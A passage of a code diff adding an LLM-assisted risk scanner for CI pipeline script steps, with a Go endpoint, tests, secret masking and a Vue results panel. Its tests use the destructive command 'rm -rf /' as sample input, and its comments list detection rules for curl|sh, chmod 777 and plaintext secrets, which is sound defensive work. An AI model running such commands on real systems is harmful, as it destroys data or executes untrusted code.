+	// 应命中明文密钥 high。
+	f := findingWithTitle(report, "硬编码明文密钥")
+	if f == nil || f.Level != RiskHigh {
+		t.Fatalf("应命中明文密钥 high: %+v", report.Findings)
+	}
+	// 任何 finding 字段绝不回显明文 secret。
+	for _, fd := range report.Findings {
+		joined := fd.Title + fd.Why + fd.Suggestion + fd.StepName
+		if strings.Contains(joined, fakeScriptSecret) {
+			t.Fatalf("finding 泄漏了明文 secret: %+v", fd)
+		}
+	}
+}
+
+// TestAnnotateRisksAIEnhanced 验证 AI 已配时跑 LLM 增强,且 AI finding 来源为 ai。
+func TestAnnotateRisksAIEnhanced(t *testing.T) {
+	aiJSON := `{
+	  "findings": [
+	    { "level": "low", "stepName": "部署", "line": 2, "title": "部署后未回滚", "why": "失败时无回滚", "suggestion": "加 rollout undo" }
+	  ]
+	}`
+	srv, _ := diagStubLLM(t, ProviderOpenAI, aiJSON)
+	svc, _, _ := newService(t, srv.Client())
+	configureEnabled(t, svc, ProviderOpenAI, srv.URL)
+
+	report, err := svc.AnnotateRisks(ctx(), AnnotateRisksInput{
+		Steps: []ScriptStep{
+			{Name: "部署", Image: "node:20.11", Commands: []string{"echo ok", "kubectl apply -f k8s/"}},
+		},
+		Masker: maskerForScript(),
+	})
+	if err != nil {
+		t.Fatalf("AnnotateRisks: %v", err)
+	}
+	if !report.AIEnhanced {
+		t.Fatalf("AI 已配应 AIEnhanced=true (reason=%q)", report.AIReason)
+	}
+	ai := findingWithTitle(report, "部署后未回滚")
+	if ai == nil || ai.Source != "ai" {
+		t.Fatalf("应含来源为 ai 的语义级 finding: %+v", report.Findings)
+	}
+}
+
+// TestAnnotateRisksMasksSecretToLLM 验证出网前脱敏:发往 LLM 的 prompt 绝无明文 secret,
+// 且模型回显 secret 时二次脱敏。
+func TestAnnotateRisksMasksSecretToLLM(t *testing.T) {
+	// 让 stub LLM 把含 secret 的内容回显到 finding,验二次脱敏。
+	echoJSON := `{
+	  "findings": [
+	    { "level": "high", "stepName": "x", "line": 1, "title": "泄漏 ` + fakeScriptSecret + `", "why": "含 ` + fakeScriptSecret + `", "suggestion": "移除 ` + fakeScriptSecret + `" }
+	  ]
+	}`
+	srv, cap := diagStubLLM(t, ProviderOpenAI, echoJSON)
+	svc, _, _ := newService(t, srv.Client())
+	configureEnabled(t, svc, ProviderOpenAI, srv.URL)
+
+	report, err := svc.AnnotateRisks(ctx(), AnnotateRisksInput{
+		Steps: []ScriptStep{
+			{Name: "x", Image: "alpine:3.19", Commands: []string{"export TOKEN=" + fakeScriptSecret}},
+		},
+		Masker: maskerForScript(),
+	})
+	if err != nil {
+		t.Fatalf("AnnotateRisks: %v", err)
+	}
+	// 1) 出网 prompt(请求 body)绝无明文 secret。
+	if strings.Contains(cap.get(), fakeScriptSecret) {
+		t.Fatalf("出网 prompt 泄漏了明文 secret")
+	}
+	// 2) 任何 finding 字段绝无明文 secret(二次脱敏)。
+	for _, fd := range report.Findings {
+		joined := fd.Title + fd.Why + fd.Suggestion + fd.StepName
+		if strings.Contains(joined, fakeScriptSecret) {
+			t.Fatalf("finding 泄漏明文 secret: %+v", fd)
+		}
+	}
+}
+
+// TestAnnotateRisksLLMFailDegrades 验证 LLM 不可解析时优雅降级:仍返回确定性结果,绝不 error。
+func TestAnnotateRisksLLMFailDegrades(t *testing.T) {
+	srv, _ := diagStubLLM(t, ProviderOpenAI, "抱歉,我无法分析。")
+	svc, _, _ := newService(t, srv.Client())
+	configureEnabled(t, svc, ProviderOpenAI, srv.URL)
+
+	report, err := svc.AnnotateRisks(ctx(), AnnotateRisksInput{
+		Steps:  []ScriptStep{{Name: "x", Image: "node:latest", Commands: []string{"rm -rf /"}}},
+		Masker: maskerForScript(),
+	})
+	if err != nil {
+		t.Fatalf("不可解析应降级不返 error,得 %v", err)
+	}
+	if report.AIEnhanced {
+		t.Fatalf("不可解析不应 AIEnhanced=true")
+	}
+	// 确定性结果仍在。
+	if findingWithTitle(report, "递归强制删除") == nil {
+		t.Fatalf("降级时确定性结果应仍存在: %+v", report.Findings)
+	}
+}
+
+// TestAnnotateRisksCleanScript 验证无风险脚本返回空 findings(非 nil)。
+func TestAnnotateRisksCleanScript(t *testing.T) {
+	svc, _, _ := newService(t, http.DefaultClient)
+	report, err := svc.AnnotateRisks(ctx(), AnnotateRisksInput{
+		Steps:  []ScriptStep{{Name: "构建", Image: "node:20.11", Commands: []string{"npm ci && npm run build"}}},
+		Masker: maskerForScript(),
+	})
+	if err != nil {
+		t.Fatalf("AnnotateRisks: %v", err)
+	}
+	if report.Findings == nil {
+		t.Fatalf("findings 应为非 nil 空切片")
+	}
+	for _, f := range report.Findings {
+		if f.Level == RiskHigh {
+			t.Fatalf("干净脚本不应有 high 风险: %+v", f)
+		}
+	}
+}
+
+// TestAnnotateRisksNilMaskerNoPanic 验证 Masker 为 nil 时兜底不 panic。
+func TestAnnotateRisksNilMaskerNoPanic(t *testing.T) {
+	svc, _, _ := newService(t, http.DefaultClient)
+	_, err := svc.AnnotateRisks(ctx(), AnnotateRisksInput{
+		Steps:  []ScriptStep{{Name: "x", Commands: []string{"echo hi"}}},
+		Masker: nil,
+	})
+	if err != nil {
+		t.Fatalf("nil masker 应兜底不报错: %v", err)
+	}
+}

--- a/internal/httpapi/ai_generate_test.go
+++ b/internal/httpapi/ai_generate_test.go
@@ -44,6 +44,9 @@ func (s *stubAIService) Generate(_ context.Context, in ai.GenerateInput) (*ai.Pr
 func (s *stubAIService) Diagnose(context.Context, ai.DiagnoseInput) (*ai.Diagnosis, error) {
 	return &ai.Diagnosis{Status: "unavailable", Reason: "stub"}, nil
 }
+func (s *stubAIService) AnnotateRisks(context.Context, ai.AnnotateRisksInput) (*ai.RiskReport, error) {
+	return &ai.RiskReport{Findings: []ai.RiskFinding{}}, nil
+}
 
 // ---- stub analyzer ----
 

--- a/internal/httpapi/ai_risk.go
+++ b/internal/httpapi/ai_risk.go
@@ -1,0 +1,139 @@
+package httpapi
+
+import (
+	"context"
+	"net/http"
+	"time"
+
+	"github.com/go-chi/chi/v5"
+	"github.com/huangchengsir/pipewright/internal/ai"
+	"github.com/huangchengsir/pipewright/internal/mask"
+	"github.com/huangchengsir/pipewright/internal/pipeline"
+	"github.com/huangchengsir/pipewright/internal/project"
+)
+
+// ai_risk.go 是「AI 脚本风险标注」HTTP 层(护城河 · AI moat)。
+//
+// POST /api/projects/{id}/pipeline/analyze-risks(认证 + CSRF):对项目流水线 settings 里的
+// 脚本步骤(Epic 8 script step)做风险标注。编排:取项目(404)→ 取 settings 脚本步骤 →
+// 据项目凭据建 Masker(出网前脱敏)→ ai.AnnotateRisks(确定性规则 + 可选 LLM 增强)→ 回 DTO。
+//
+// **优雅降级铁律**:AI 未配/失败 → 仍回 200 + 确定性规则结果 + aiEnhanced=false + reason;
+// 绝不 500、绝无明文密钥。AnnotateRisks 本身永不 error(护城河:无 AI 也有价值)。
+
+// ---- 风险标注 DTO(契约形状;camelCase;绝无明文密钥) ----
+
+type riskFindingDTO struct {
+	Level      string `json:"level"`      // high | medium | low
+	StepName   string `json:"stepName"`   //
+	Line       int    `json:"line"`       // 1-based;0=步骤/镜像级
+	Title      string `json:"title"`      //
+	Why        string `json:"why"`        //
+	Suggestion string `json:"suggestion"` //
+	Source     string `json:"source"`     // rule | ai
+}
+
+// analyzeRisksDTO 是 analyze-risks 端点响应。findings 永不为 null。
+type analyzeRisksDTO struct {
+	Findings    []riskFindingDTO `json:"findings"`
+	AIEnhanced  bool             `json:"aiEnhanced"`
+	AIReason    string           `json:"aiReason"`
+	GeneratedAt string           `json:"generatedAt"`
+}
+
+func toAnalyzeRisksDTO(r *ai.RiskReport) analyzeRisksDTO {
+	findings := make([]riskFindingDTO, 0, len(r.Findings))
+	for _, f := range r.Findings {
+		findings = append(findings, riskFindingDTO{
+			Level:      f.Level,
+			StepName:   f.StepName,
+			Line:       f.Line,
+			Title:      f.Title,
+			Why:        f.Why,
+			Suggestion: f.Suggestion,
+			Source:     f.Source,
+		})
+	}
+	return analyzeRisksDTO{
+		Findings:    findings,
+		AIEnhanced:  r.AIEnhanced,
+		AIReason:    r.AIReason,
+		GeneratedAt: r.GeneratedAt.UTC().Format(time.RFC3339),
+	}
+}
+
+// aiRiskDeps 聚合 analyze-risks handler 所需服务(复用已注入服务,无新顶层依赖)。
+type aiRiskDeps struct {
+	aiSvc        ai.Service
+	projects     project.Service
+	settings     pipeline.SettingsService
+	secretSource *RunSecretSource
+}
+
+// makeAnalyzeRisksHandler 返回 POST /api/projects/{id}/pipeline/analyze-risks handler。
+//
+// 项目不存在 → 404;服务未初始化 → 503。其余一律 200(含 AI 未配/失败的优雅降级)。
+func makeAnalyzeRisksHandler(d aiRiskDeps) http.HandlerFunc {
+	return func(w http.ResponseWriter, r *http.Request) {
+		if d.aiSvc == nil || d.projects == nil || d.settings == nil {
+			writeError(w, http.StatusServiceUnavailable, "internal", "风险标注所需服务未初始化")
+			return
+		}
+		id := chi.URLParam(r, "id")
+		ctx := r.Context()
+
+		// 项目存在性(404 与既有 ai-generate 一致)。
+		if _, err := d.projects.Get(ctx, id); err != nil {
+			if err == project.ErrNotFound {
+				writeError(w, http.StatusNotFound, "project_not_found", "项目不存在")
+				return
+			}
+			writeError(w, http.StatusInternalServerError, "internal", "服务器内部错误")
+			return
+		}
+
+		// 取流水线 settings 的脚本步骤(Epic 8);取不到则降级为空步骤(仍返回空报告,不 500)。
+		steps := []ai.ScriptStep{}
+		if st, err := d.settings.Get(ctx, id); err == nil && st != nil {
+			steps = toAIScriptSteps(st.Steps)
+		}
+
+		// 出网前脱敏:据项目凭据建 Masker(把 secret env 明文登记后,命令进 prompt 前一律脱敏)。
+		masker := maskerForProject(ctx, d.secretSource, id)
+
+		report, _ := d.aiSvc.AnnotateRisks(ctx, ai.AnnotateRisksInput{
+			Steps:  steps,
+			Masker: masker,
+		})
+		if report == nil {
+			// 极端兜底:AnnotateRisks 约定永不返 nil,但仍防御性给空报告(绝不 500)。
+			report = &ai.RiskReport{Findings: []ai.RiskFinding{}, GeneratedAt: time.Now().UTC()}
+		}
+		writeJSON(w, http.StatusOK, toAnalyzeRisksDTO(report))
+	}
+}
+
+// toAIScriptSteps 把 pipeline 脚本步骤映射为 ai 中性入参(ai 包不 import pipeline)。
+func toAIScriptSteps(steps []pipeline.PipelineStep) []ai.ScriptStep {
+	out := make([]ai.ScriptStep, 0, len(steps))
+	for _, st := range steps {
+		cmds := make([]string, len(st.Commands))
+		copy(cmds, st.Commands)
+		out = append(out, ai.ScriptStep{
+			Name:     st.Name,
+			Image:    st.Image,
+			Commands: cmds,
+		})
+	}
+	return out
+}
+
+// maskerForProject 返回登记了该项目真实凭据(+ 桩假 secret)的 Masker;secretSrc 为 nil 时
+// 降级为只登记桩 secret(纯单测/未装配场景)。供脚本风险标注出网前脱敏。
+func maskerForProject(ctx context.Context, src *RunSecretSource, projectID string) *mask.Masker {
+	if src == nil {
+		m := mask.NewMasker()
+		return m
+	}
+	return src.MaskerForProject(ctx, projectID)
+}

--- a/internal/httpapi/ai_risk_test.go
+++ b/internal/httpapi/ai_risk_test.go
@@ -1,0 +1,81 @@
+package httpapi
+
+import (
+	"io"
+	"net/http"
+	"testing"
+	"time"
+
+	"github.com/huangchengsir/pipewright/internal/ai"
+)
+
+// TestAnalyzeRisksHappyPath 验证风险标注端点回 200 + findings + aiEnhanced 透传。
+func TestAnalyzeRisksHappyPath(t *testing.T) {
+	stub := &diagStubAI{risk: &ai.RiskReport{
+		Findings: []ai.RiskFinding{
+			{Level: ai.RiskHigh, StepName: "构建", Line: 1, Title: "递归强制删除根/通配路径", Why: "rm -rf /", Suggestion: "固定子目录", Source: "rule"},
+			{Level: ai.RiskLow, StepName: "部署", Line: 0, Title: "部署后未回滚", Why: "无回滚", Suggestion: "加 rollout undo", Source: "ai"},
+		},
+		AIEnhanced:  true,
+		GeneratedAt: time.Now().UTC(),
+	}}
+	srv, client, csrf, projID := setupAIGenServer(t, stub, stubAnalyzer{res: ai.RepoAnalysis{Cloned: true}})
+
+	resp := doJSON(t, client, http.MethodPost, srv.URL+"/api/projects/"+projID+"/pipeline/analyze-risks", csrf, ``)
+	defer resp.Body.Close()
+	if resp.StatusCode != http.StatusOK {
+		raw, _ := io.ReadAll(resp.Body)
+		t.Fatalf("status = %d, want 200, body=%s", resp.StatusCode, raw)
+	}
+	dto := decode(t, resp)
+	if dto["aiEnhanced"] != true {
+		t.Fatalf("aiEnhanced 应透传 true: %v", dto)
+	}
+	findings, _ := dto["findings"].([]any)
+	if len(findings) != 2 {
+		t.Fatalf("findings = %d, want 2: %v", len(findings), dto)
+	}
+	first, _ := findings[0].(map[string]any)
+	if first["level"] != "high" || first["source"] != "rule" {
+		t.Fatalf("finding[0] 映射错误: %v", first)
+	}
+}
+
+// TestAnalyzeRisksProjectNotFound 验证项目不存在 → 404。
+func TestAnalyzeRisksProjectNotFound(t *testing.T) {
+	stub := &diagStubAI{}
+	srv, client, csrf, _ := setupAIGenServer(t, stub, stubAnalyzer{res: ai.RepoAnalysis{Cloned: true}})
+
+	resp := doJSON(t, client, http.MethodPost, srv.URL+"/api/projects/nope-id/pipeline/analyze-risks", csrf, ``)
+	defer resp.Body.Close()
+	if resp.StatusCode != http.StatusNotFound {
+		t.Fatalf("不存在项目应 404, got %d", resp.StatusCode)
+	}
+}
+
+// TestAnalyzeRisksDegradesNoAI 验证 AI 未配(stub 返回 aiEnhanced=false + reason)仍 200。
+func TestAnalyzeRisksDegradesNoAI(t *testing.T) {
+	stub := &diagStubAI{risk: &ai.RiskReport{
+		Findings:    []ai.RiskFinding{},
+		AIEnhanced:  false,
+		AIReason:    "AI 未配置或未启用,仅展示确定性规则结果",
+		GeneratedAt: time.Now().UTC(),
+	}}
+	srv, client, csrf, projID := setupAIGenServer(t, stub, stubAnalyzer{res: ai.RepoAnalysis{Cloned: true}})
+
+	resp := doJSON(t, client, http.MethodPost, srv.URL+"/api/projects/"+projID+"/pipeline/analyze-risks", csrf, ``)
+	defer resp.Body.Close()
+	if resp.StatusCode != http.StatusOK {
+		t.Fatalf("AI 未配应 200(不阻断), got %d", resp.StatusCode)
+	}
+	dto := decode(t, resp)
+	if dto["aiEnhanced"] != false {
+		t.Fatalf("aiEnhanced 应为 false: %v", dto)
+	}
+	if r, _ := dto["aiReason"].(string); r == "" {
+		t.Fatalf("aiReason 应有人读原因")
+	}
+	if _, ok := dto["findings"].([]any); !ok {
+		t.Fatalf("findings 应为数组(非 null): %v", dto)
+	}
+}

--- a/internal/httpapi/router.go
+++ b/internal/httpapi/router.go
@@ -487,6 +487,13 @@ func New(webFS fs.FS, authn auth.Authenticator, opts ...Option) http.Handler {
 		ar.Post("/projects/{id}/pipeline/ai-generate", makeAIGenerateHandler(aiGenDeps))
 		ar.Post("/projects/{id}/pipeline/ai-apply", makeAIApplyHandler(aiGenDeps))
 
+		// AI 脚本风险标注(护城河 · AI moat):对流水线脚本步骤(Epic 8 script step)做风险标注 —
+		// 确定性正则预扫(rm -rf /、curl|sh、chmod 777、明文密钥、latest 镜像)+ 可选 LLM 语义增强。
+		// 复用 aiSvc + projects(p)+ settings(ps)+ secretSource(出网前脱敏)。写方法,过 auth + CSRF。
+		// AI 未配/失败均 200 + 确定性结果 + aiEnhanced=false,绝不 500、绝无明文密钥。
+		aiRisk := aiRiskDeps{aiSvc: aiSvc, projects: p, settings: ps, secretSource: o.secretSource}
+		ar.Post("/projects/{id}/pipeline/analyze-risks", makeAnalyzeRisksHandler(aiRisk))
+
 		// 只读源码读取(Story 3.6;FR-4 预埋,7-4 消费):go-git 浅克隆读 tree/blob。
 		// 复用已注入 projects(p)+ vault(v)取凭据 + 注入的 SourceReader。reader 为 nil → 503。
 		// /source/tree、/source/blob 比 /projects/{id} 多两段,不会被吞;GET 过 auth。

--- a/internal/httpapi/run_diagnose.go
+++ b/internal/httpapi/run_diagnose.go
@@ -26,14 +26,17 @@ type diagnosisEvidenceDTO struct {
 
 // diagnosisDTO 是冻结的 diagnosis 子 DTO。status≠ready 时 hypothesis 等为空、reason 人读。
 type diagnosisDTO struct {
-	Status          string                 `json:"status"` // ready | unavailable | pending
-	Reason          string                 `json:"reason"`
-	Hypothesis      string                 `json:"hypothesis"`
-	Confidence      string                 `json:"confidence"` // high | medium | low
-	AlternateCauses []string               `json:"alternateCauses"`
-	FixSuggestions  []string               `json:"fixSuggestions"`
-	Evidence        []diagnosisEvidenceDTO `json:"evidence"`
-	GeneratedAt     string                 `json:"generatedAt"`
+	Status          string   `json:"status"` // ready | unavailable | pending
+	Reason          string   `json:"reason"`
+	Hypothesis      string   `json:"hypothesis"`
+	Confidence      string   `json:"confidence"` // high | medium | low
+	AlternateCauses []string `json:"alternateCauses"`
+	FixSuggestions  []string `json:"fixSuggestions"`
+	// FixScript 是可复制粘贴的修复脚本/补丁片段(护城河 · AI moat;additive 字段)。脱敏后输出;
+	// 模型未给出 → 空串。前端在诊断面板展示「一键复制修复脚本」。
+	FixScript   string                 `json:"fixScript"`
+	Evidence    []diagnosisEvidenceDTO `json:"evidence"`
+	GeneratedAt string                 `json:"generatedAt"`
 }
 
 // toDiagnosisDTO 把领域 run.Diagnosis 映射为冻结 DTO(nil → nil,run-detail diagnosis=null)。
@@ -60,6 +63,7 @@ func toDiagnosisDTO(d *run.Diagnosis) *diagnosisDTO {
 		Confidence:      d.Confidence,
 		AlternateCauses: alt,
 		FixSuggestions:  fixes,
+		FixScript:       d.FixScript,
 		Evidence:        ev,
 		GeneratedAt:     d.GeneratedAt.UTC().Format(time.RFC3339),
 	}
@@ -81,6 +85,7 @@ func aiToRunDiagnosis(d *ai.Diagnosis) *run.Diagnosis {
 		Confidence:      d.Confidence,
 		AlternateCauses: d.AlternateCauses,
 		FixSuggestions:  d.FixSuggestions,
+		FixScript:       d.FixScript,
 		Evidence:        ev,
 		GeneratedAt:     d.GeneratedAt,
 	}

--- a/internal/httpapi/run_diagnose_test.go
+++ b/internal/httpapi/run_diagnose_test.go
@@ -20,9 +20,11 @@ import (
 
 // diagStubAI 是可配置的 ai.Service 桩(只实现诊断路径所需;其余返回零值)。
 type diagStubAI struct {
-	diag       *ai.Diagnosis // Diagnose 返回值
-	gotLog     string        // 记录收到的失败日志(脱敏前)
-	gotMaskLog bool          // Diagnose 内是否已脱敏(经 Masker.Scrub 验证)
+	diag       *ai.Diagnosis  // Diagnose 返回值
+	gotLog     string         // 记录收到的失败日志(脱敏前)
+	gotMaskLog bool           // Diagnose 内是否已脱敏(经 Masker.Scrub 验证)
+	risk       *ai.RiskReport // AnnotateRisks 返回值(nil → 空报告)
+	gotSteps   []ai.ScriptStep
 }
 
 func (s *diagStubAI) Get(context.Context) (*ai.Config, error) { return &ai.Config{}, nil }
@@ -51,6 +53,13 @@ func (s *diagStubAI) Diagnose(_ context.Context, in ai.DiagnoseInput) (*ai.Diagn
 		Evidence:        []ai.DiagnosisEvidence{},
 		GeneratedAt:     time.Now().UTC(),
 	}, nil
+}
+func (s *diagStubAI) AnnotateRisks(_ context.Context, in ai.AnnotateRisksInput) (*ai.RiskReport, error) {
+	s.gotSteps = in.Steps
+	if s.risk != nil {
+		return s.risk, nil
+	}
+	return &ai.RiskReport{Findings: []ai.RiskFinding{}, GeneratedAt: time.Now().UTC()}, nil
 }
 
 // setupDiagnoseServer 构造带 auth + project + run(失败 runner,FailAt=0)+ stub AI 的 server。

--- a/internal/httpapi/run_secrets.go
+++ b/internal/httpapi/run_secrets.go
@@ -47,6 +47,19 @@ func (s *RunSecretSource) MaskerForRun(ctx context.Context, runID string) *mask.
 	return m
 }
 
+// MaskerForProject 返回一个登记了该项目全部真实凭据明文(+ 桩假 secret)的 Masker。
+// 供「不绑定具体 run」的出网脱敏复用(如脚本风险标注:把 settings secret env 明文登记后,
+// 命令进 LLM prompt 前一律脱敏)。best-effort,绝不 panic。
+func (s *RunSecretSource) MaskerForProject(ctx context.Context, projectID string) *mask.Masker {
+	m := mask.NewMasker()
+	m.RegisterSecret(run.StubFailureSecret)
+	if s == nil || projectID == "" {
+		return m
+	}
+	s.registerProjectSecrets(ctx, m, projectID)
+	return m
+}
+
 // registerProjectSecrets 把某项目相关的所有 secret 凭据明文登记进 Masker(best-effort)。
 func (s *RunSecretSource) registerProjectSecrets(ctx context.Context, m *mask.Masker, projectID string) {
 	if s.vault == nil {

--- a/internal/run/diagnosis.go
+++ b/internal/run/diagnosis.go
@@ -22,6 +22,7 @@ type diagnosisRow struct {
 	Confidence      string                 `json:"confidence"`
 	AlternateCauses []string               `json:"alternateCauses"`
 	FixSuggestions  []string               `json:"fixSuggestions"`
+	FixScript       string                 `json:"fixScript,omitempty"`
 	Evidence        []diagnosisEvidenceRow `json:"evidence"`
 	GeneratedAt     string                 `json:"generatedAt"`
 }
@@ -56,6 +57,7 @@ func encodeDiagnosis(d *Diagnosis) (string, error) {
 		Confidence:      d.Confidence,
 		AlternateCauses: alt,
 		FixSuggestions:  fixes,
+		FixScript:       d.FixScript,
 		Evidence:        ev,
 		GeneratedAt:     d.GeneratedAt.UTC().Format(time.RFC3339),
 	}
@@ -88,6 +90,7 @@ func decodeDiagnosis(s string) (*Diagnosis, error) {
 		Confidence:      row.Confidence,
 		AlternateCauses: row.AlternateCauses,
 		FixSuggestions:  row.FixSuggestions,
+		FixScript:       row.FixScript,
 		Evidence:        ev,
 	}
 	if t, perr := time.Parse(time.RFC3339, row.GeneratedAt); perr == nil {

--- a/internal/run/diagnosis_test.go
+++ b/internal/run/diagnosis_test.go
@@ -81,6 +81,7 @@ func TestSaveAndGetDiagnosis(t *testing.T) {
 		Confidence:      "high",
 		AlternateCauses: []string{"也可能是 lockfile 未提交"},
 		FixSuggestions:  []string{"声明依赖并提交 lockfile"},
+		FixScript:       "npm install leftpad@^1.3.0 --save\ngit add package-lock.json",
 		Evidence:        []DiagnosisEvidence{{Line: 2, Text: "npm ERR! missing", Highlight: true}},
 		GeneratedAt:     time.Now().UTC().Truncate(time.Second),
 	}
@@ -97,6 +98,9 @@ func TestSaveAndGetDiagnosis(t *testing.T) {
 	}
 	if len(got.Evidence) != 1 || got.Evidence[0].Line != 2 || !got.Evidence[0].Highlight {
 		t.Fatalf("evidence 往返不一致: %+v", got.Evidence)
+	}
+	if got.FixScript != want.FixScript {
+		t.Fatalf("fixScript 往返不一致: %q vs %q", got.FixScript, want.FixScript)
 	}
 	if !got.GeneratedAt.Equal(want.GeneratedAt) {
 		t.Fatalf("generatedAt 往返不一致: %v vs %v", got.GeneratedAt, want.GeneratedAt)

--- a/internal/run/run.go
+++ b/internal/run/run.go
@@ -177,6 +177,7 @@ type Diagnosis struct {
 	Confidence      string              // high | medium | low
 	AlternateCauses []string            // 低置信时非空
 	FixSuggestions  []string            // 修复建议
+	FixScript       string              // 可执行修复脚本/补丁片段(护城河;脱敏后搬运;空串=无)
 	Evidence        []DiagnosisEvidence // 脱敏后日志证据
 	GeneratedAt     time.Time           // 生成时刻
 }

--- a/web/src/api/aiRisk.ts
+++ b/web/src/api/aiRisk.ts
@@ -1,0 +1,46 @@
+/**
+ * AI script-risk annotation API (AI moat).
+ *
+ * POST /api/projects/{id}/pipeline/analyze-risks → AnalyzeRisksResponse
+ *
+ * Annotates the pipeline's script-step commands for risks: a deterministic
+ * regex pre-pass (rm -rf /, curl|sh, chmod 777, plaintext secrets, unpinned
+ * `latest` images) PLUS an optional LLM semantic pass. Always returns 200 —
+ * when AI is unconfigured/failed it gracefully degrades to rule-only findings
+ * with `aiEnhanced=false` and a human reason. Secrets are masked server-side;
+ * findings never echo a detected plaintext secret.
+ */
+
+import { http } from './http'
+
+export type RiskLevel = 'high' | 'medium' | 'low'
+export type RiskSource = 'rule' | 'ai'
+
+export interface RiskFinding {
+  level: RiskLevel
+  /** Step the finding belongs to (may be empty). */
+  stepName: string
+  /** 1-based command line within the step; 0 = step/image-level. */
+  line: number
+  title: string
+  why: string
+  suggestion: string
+  /** `rule` = deterministic regex; `ai` = LLM semantic pass. */
+  source: RiskSource
+}
+
+export interface AnalyzeRisksResponse {
+  /** Never null — empty array means no risks found. */
+  findings: RiskFinding[]
+  /** Whether the LLM semantic pass actually ran (false = rule-only). */
+  aiEnhanced: boolean
+  /** Human reason when aiEnhanced=false (AI unconfigured/failed). Never contains secrets. */
+  aiReason: string
+  generatedAt: string
+}
+
+export async function analyzeRisks(projectId: string): Promise<AnalyzeRisksResponse> {
+  return http.post<AnalyzeRisksResponse>(
+    `/api/projects/${projectId}/pipeline/analyze-risks`,
+  )
+}

--- a/web/src/api/runs.ts
+++ b/web/src/api/runs.ts
@@ -102,6 +102,12 @@ export interface DiagnosisDTO {
   confidence: DiagnosisConfidence
   alternateCauses: string[]   // populated when confidence='low'
   fixSuggestions: string[]
+  /**
+   * Concrete copy-pasteable fix script / patch snippet for the failing step
+   * (AI moat). Empty string when the model gave none. Already masked
+   * server-side — no secrets reach the client.
+   */
+  fixScript: string
   evidence: DiagnosisEvidence[]
   generatedAt: string         // RFC3339
 }

--- a/web/src/components/pipeline/RiskAnnotationPanel.vue
+++ b/web/src/components/pipeline/RiskAnnotationPanel.vue
@@ -1,0 +1,397 @@
+<script setup lang="ts">
+/**
+ * RiskAnnotationPanel — AI script-risk annotation (AI moat).
+ *
+ * On-demand audit of the pipeline's script-step commands. Calls
+ * POST /api/projects/{id}/pipeline/analyze-risks and renders findings grouped
+ * by severity. Works even with AI unconfigured — the backend always returns
+ * deterministic rule findings (rm -rf /, curl|sh, chmod 777, plaintext
+ * secrets, unpinned `latest` images); the LLM pass is additive. Findings are
+ * masked server-side and never echo a detected plaintext secret.
+ *
+ * Design language mirrors DiagnosisPanel (cyan = AI semantic color; severity
+ * dots red/amber/grey; mono for the risky line ref). Motion is transform +
+ * opacity only, with prefers-reduced-motion guard.
+ */
+import { ref, computed } from 'vue'
+import { analyzeRisks, type RiskFinding, type RiskLevel } from '../../api/aiRisk'
+import { HttpError } from '../../api/http'
+import AppButton from '../ui/AppButton.vue'
+
+const props = defineProps<{
+  projectId: string
+}>()
+
+type RunState = 'idle' | 'running' | 'done' | 'error'
+
+const state = ref<RunState>('idle')
+const errorMsg = ref('')
+const findings = ref<RiskFinding[]>([])
+const aiEnhanced = ref(false)
+const aiReason = ref('')
+
+const LEVEL_ORDER: Record<RiskLevel, number> = { high: 0, medium: 1, low: 2 }
+
+const sortedFindings = computed(() =>
+  [...findings.value].sort((a, b) => {
+    const byLevel = LEVEL_ORDER[a.level] - LEVEL_ORDER[b.level]
+    if (byLevel !== 0) return byLevel
+    return a.line - b.line
+  }),
+)
+
+const counts = computed(() => {
+  const c = { high: 0, medium: 0, low: 0 }
+  for (const f of findings.value) c[f.level]++
+  return c
+})
+
+const hasFindings = computed(() => findings.value.length > 0)
+
+function levelLabel(level: RiskLevel): string {
+  switch (level) {
+    case 'high':   return '高危'
+    case 'medium': return '中危'
+    case 'low':    return '提示'
+  }
+}
+
+async function runAnalysis(): Promise<void> {
+  if (state.value === 'running') return
+  state.value = 'running'
+  errorMsg.value = ''
+  try {
+    const res = await analyzeRisks(props.projectId)
+    findings.value = res.findings
+    aiEnhanced.value = res.aiEnhanced
+    aiReason.value = res.aiReason
+    state.value = 'done'
+  } catch (err) {
+    if (err instanceof HttpError) {
+      errorMsg.value = err.apiError?.message ?? `风险标注失败(${err.status})`
+    } else {
+      errorMsg.value = '风险标注失败,请稍后重试'
+    }
+    state.value = 'error'
+  }
+}
+</script>
+
+<template>
+  <section class="rap" aria-label="AI 脚本风险标注">
+    <!-- Header -->
+    <div class="rap-head">
+      <div class="rap-head-left">
+        <span class="rap-icon" aria-hidden="true">
+          <svg width="13" height="13" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2.1" stroke-linecap="round" stroke-linejoin="round">
+            <path d="M12 22s8-4 8-10V5l-8-3-8 3v7c0 6 8 10 8 10z" />
+            <path d="M12 8v4M12 16h.01" />
+          </svg>
+        </span>
+        <span class="rap-title">AI 脚本风险标注</span>
+        <span class="rap-subtitle">护城河 · 提交前先体检</span>
+      </div>
+
+      <!-- Severity summary (only after a run) -->
+      <div v-if="state === 'done' && hasFindings" class="rap-summary" aria-hidden="true">
+        <span v-if="counts.high" class="rap-chip rap-chip--high">{{ counts.high }} 高危</span>
+        <span v-if="counts.medium" class="rap-chip rap-chip--medium">{{ counts.medium }} 中危</span>
+        <span v-if="counts.low" class="rap-chip rap-chip--low">{{ counts.low }} 提示</span>
+      </div>
+    </div>
+
+    <!-- Body -->
+    <div class="rap-body">
+      <!-- Idle / re-run control -->
+      <div class="rap-actions">
+        <AppButton variant="ai" :loading="state === 'running'" @click="runAnalysis">
+          <svg v-if="state !== 'running'" width="13" height="13" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2.2" aria-hidden="true">
+            <path d="M12 22s8-4 8-10V5l-8-3-8 3v7c0 6 8 10 8 10z" />
+          </svg>
+          {{ state === 'running' ? 'AI 扫描中…' : (state === 'idle' ? '扫描脚本风险' : '重新扫描') }}
+        </AppButton>
+        <p v-if="state === 'idle'" class="rap-hint">
+          检测危险命令、明文密钥、未固定镜像与缺健康检查等风险。AI 未配置时仍有确定性规则结果。
+        </p>
+        <span v-else-if="state === 'done'" class="rap-source" :class="{ 'rap-source--ai': aiEnhanced }">
+          {{ aiEnhanced ? 'AI 语义增强已启用' : (aiReason || '仅确定性规则结果') }}
+        </span>
+      </div>
+
+      <!-- Error -->
+      <p v-if="state === 'error'" class="rap-error" role="alert">{{ errorMsg }}</p>
+
+      <!-- Clean -->
+      <div v-else-if="state === 'done' && !hasFindings" class="rap-clean" role="status">
